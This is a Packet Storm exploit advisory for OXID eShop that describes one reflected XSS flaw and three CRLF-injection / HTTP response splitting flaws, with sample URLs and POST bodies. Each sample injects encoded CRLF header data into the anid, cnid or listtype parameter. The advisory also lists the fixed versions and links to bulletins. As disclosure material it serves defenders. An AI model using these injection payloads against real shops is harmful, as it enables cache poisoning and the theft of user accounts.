Lucene search
StormPACKETSTORM:125814HistoryMar 20, 2014 - 12:00 a.m.
OXID eShop XSS / CRLF Injection
2014-03-2000:00:00
storm
packetstormsecurity.com
23
0.001 Low
EPSS
Percentile
48.9%
`# Exploit Title: OXID eShop v<4.7.11/5.0.11 + v<4.8.4/5.1.4 Multiple Vulnerabilities
# Google Dork: -
# Date: 12/2013
# Exploit Author: //sToRm
# Author mail: [email protected]
# Vendor Homepage: http://www.oxid-esales.com
# Software Link: -
# Version: All versions < 4.7.11/5.0.11 + All versions < 4.8.4/5.1.4
# Tested on: Multiple platforms
# CVE : CVE-2014-2016 + CVE-2014-2017 (reserved)
###########################################################################################################
# XSS vulnerability #######################################################################################
Under certain circumstances, an attacker can trick a user to enter a specially crafted
URI or click on a mal-formed link to exploit a cross-site scripting vulnerability that
theoretically can be used to gain unauthorized access to a user account or collect
sensitive information of this user.
SAMPLE: -------------------------------------------------------------------------------
http://HOST/tag/sample/sample-name.html?cur=2&listtype=tag&pgNr=2&searchtag=[XSS]
---------------------------------------------------------------------------------------
Products:
OXID eShop Enterprise Edition
OXID eShop Professional Edition
OXID eShop Community Edition
Releases: All previous releases
Platforms: All releases are affected on all platforms.
STATE
- Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4.
- A fix for OXID eShop version 4.6.8 is available.
Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-001
###########################################################################################################
###########################################################################################################
###########################################################################################################
# Multiple CRLF injection / HTTP response splitting #######################################################
Under certain circumstances (depending on the browser, OS, PHP-Version), an attacker can trick a user to
enter a specially crafted URI or click on a mal-formed link to exploit a HTTP response splitting vulnerability
that theoretically can be used to poison cache, gain unauthorized access to a user account or collect
sensitive information of this user.
A possible exploit by passing such a mal-formed URI could lead to:
- return of a blank page or a PHP error (depending on one's server configuration)
- set unsolicited browser cookies
Products:
OXID eShop Enterprise Edition
OXID eShop Professional Edition
OXID eShop Community Edition
Releases: All previous releases
Platforms: All releases are affected on all platforms.
STATE:
- Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4.
- A fix for OXID eShop version 4.6.8 is available.
Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-002
Vulnerability details:
###########################################################################################################
# 1 # CRLF injection / HTTP response splitting ############################################################
PATH: ROOT/index.php
PARAMETER: anid
CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=start
&aid=1
&am=1
&anid=%0d%0a%20[INJECT:INJECT]
&cl=start
&fnc=tobasket
&lang=0
&pgNr=0
&stoken=1
-----------------------------------------------------------------------------------------------------------
SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=start&aid=1&am=1&anid=%0d%0a%20INJECTED:INJECTED_DATA&cl=start&fnc=tobasket&lang=0&pgNr=0&stoken=1
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################
###########################################################################################################
# 2 # CRLF injection / HTTP response splitting ############################################################
PATH: ROOT/index.php
PARAMETER: cnid
CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=details
&aid=1
&am=1
&anid=0
&cl=details
&cnid=%0d%0a%20[INJECTED:INJECTED]
&fnc=tobasket
&lang=0
&listtype=list
&panid=
&parentid=1
&stoken=1
&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=%0d%0a%20INJECTED:INJECTED_DATA&fnc=tobasket&lang=0&listtype=list&panid=&parentid=1&stoken=1&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################
###########################################################################################################
# 3 # CRLF injection / HTTP response splitting ############################################################
PATH: ROOT/index.php
PARAMETER: listtype
CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=details
&aid=1
&am=1
&anid=0
&cl=details
&cnid=0
&fnc=tobasket
&lang=0
&listtype=%0d%0a%20[INJECTED:INJECTED]
&panid=
&parentid=0
&stoken=0
&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=0&fnc=tobasket&lang=0&listtype=%0d%0a%20INJECTED:INJECTED_DATA&panid=&parentid=0&stoken=0&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################
Many greetings to all lunatics and freaks out there who live daily in the code like me and my partners.
A thanks to the developers who have responded relatively quickly.
Cheers!
//sToRm
`
Related
exploitpack
exploitpack
OXID eShop 4.7.115.0.11 4.8.45.1.4 - Multiple Vulnerabilities
2014-03-20 00:00:00
zdt
zdt
OXID eShop < 4.7.11/5.0.11 + < 4.8.4/5.1.4 - Multiple Vulnerabilities
2014-03-21 00:00:00
seebug
seebug
OXID eShop < 4.7.11/5.0.11 + < 4.8.4/5.1.4 - Multiple Vulnerabilities
2014-07-01 00:00:00
OXID eShop 'sample-name.html'θ·¨η«θζ¬ζΌζ΄
2014-03-25 00:00:00
OXID eShop 'index.php'ε€δΈͺHTTPεΊηζεζΌζ΄
2014-03-25 00:00:00
exploitdb
exploitdb
OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities
2014-03-20 00:00:00
prion
prion
Cross site scripting
2014-03-25 18:21:00
Crlf injection
2018-01-18 14:29:00
nvd
nvd
CVE-2014-2016
2014-03-25 18:21:48
CVE-2014-2017
2018-01-18 14:29:00
cvelist
cvelist
CVE-2014-2016
2014-03-25 14:00:00
CVE-2014-2017
2018-01-18 14:00:00
cve
cve
CVE-2014-2016
2014-03-25 18:21:48
CVE-2014-2017
2018-01-18 14:29:00